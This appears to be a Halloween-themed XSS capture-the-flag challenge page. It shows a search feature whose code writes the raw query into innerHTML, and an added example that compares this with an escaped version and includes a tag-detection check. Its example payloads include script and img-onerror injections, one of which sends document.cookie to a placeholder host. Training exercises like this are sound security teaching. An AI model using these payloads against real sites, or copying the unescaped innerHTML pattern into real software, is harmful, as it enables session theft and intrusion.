Haunted Scrolls

Cursed Code Block

searchInput.addEventListener('input', function () {
    const query = searchInput.value;
    if (query.trim() !== "") {
        const filteredArticles = filterArticles(query);
        searchResultsHeading.innerHTML = `Results for: "${query}"`;
        searchResultsHeading.style.display = 'block';
        renderArticles(filteredArticles);
    } else {
        searchResultsHeading.style.display = 'none';
        renderArticles(articles);
    }
});

Spooky Documentation

Challenge Objective

Your objective is to identify the XSS vulnerability lurking in the shadows of the search feature and pop an alert box.

Application Structure

The application consists of the following haunted components:

  • Search Feature: This is where the cursed XSS vulnerability resides. It accepts user input and displays search results based on the query provided.
  • Articles Section: This section contains various ghostly articles that the search feature filters through based on the user's input.
  • Cursed Code Block: This section of the application displays the actual code responsible for rendering search results, allowing you to identify potential security flaws.
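The heading sink from the Cursed Code Block, shown here as an added example that is not part of the challenge: the unescaped string the page's code hands to innerHTML beside an escaped version, with a small check that reports whether rendered output still carries a tag. It models the sink as string builders (assumed names headingHtmlUnsafe, headingHtmlSafe, containsTag, audit) so it runs in Node without a DOM; in the browser the equivalent fix is to assign the heading with textContent instead of innerHTML.

```javascript
// Added example, not the challenge's own code. Models the search heading
// sink from the Cursed Code Block without a DOM.

// Test inputs taken from the page's Example Payloads section.
const SAMPLE_PAYLOADS = [
  "<script>alert('Boo!');</script>",
  '<img src=x onerror="alert(\'Boo!\')">',
];

// What the page's code hands to innerHTML: the query is interpolated
// verbatim, so any tag inside it is parsed as markup.
function headingHtmlUnsafe(query) {
  return `Results for: "${query}"`;
}

// Escape the five characters that change meaning in HTML text or
// attribute values; the result renders as literal text.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened builder: same heading text, query escaped first.
function headingHtmlSafe(query) {
  return `Results for: "${escapeHtml(query)}"`;
}

// Review-time check: does a rendered string still contain something an
// HTML parser would treat as an opening or closing tag?
const TAG_RE = /<\/?[a-z][^>]*>/i;
function containsTag(html) {
  return TAG_RE.test(html);
}

// Run both builders over each payload and report which one leaks markup.
function audit(payloads = SAMPLE_PAYLOADS) {
  return payloads.map((p) => ({
    payload: p,
    unsafeLeaks: containsTag(headingHtmlUnsafe(p)),
    safeLeaks: containsTag(headingHtmlSafe(p)),
  }));
}
```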

Example Payloads

Below are a few spooky payloads to get you started:

  • Basic XSS Payload:
    <script>alert('Boo!');</script>
    <script>fetch('[host]')</script>
  • More Diabolical Payload:
    <img src=x onerror="alert('Boo!')">
    <img src=x onerror="fetch('[HOST]' + document.cookie)" />

Additional Tips

  • Pay attention to the haunted HTML and JavaScript code. The context in which your payload is executed will determine its effectiveness.
  • Experiment with different sinister payloads to see how the application responds. Some might be blocked by ancient wards, while others may slip through.
  • Use developer tools to test and debug your evil payloads.

Good luck, and beware the curse of broken code!